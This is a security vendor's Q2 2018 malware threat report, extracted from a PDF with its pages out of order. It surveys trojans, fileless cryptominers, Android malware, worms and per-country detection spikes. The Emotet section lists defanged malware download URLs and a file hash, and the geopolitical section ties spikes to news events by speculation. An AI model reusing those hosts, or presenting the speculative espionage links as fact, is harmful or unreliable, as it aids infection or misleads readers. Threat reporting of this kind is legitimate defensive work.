Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
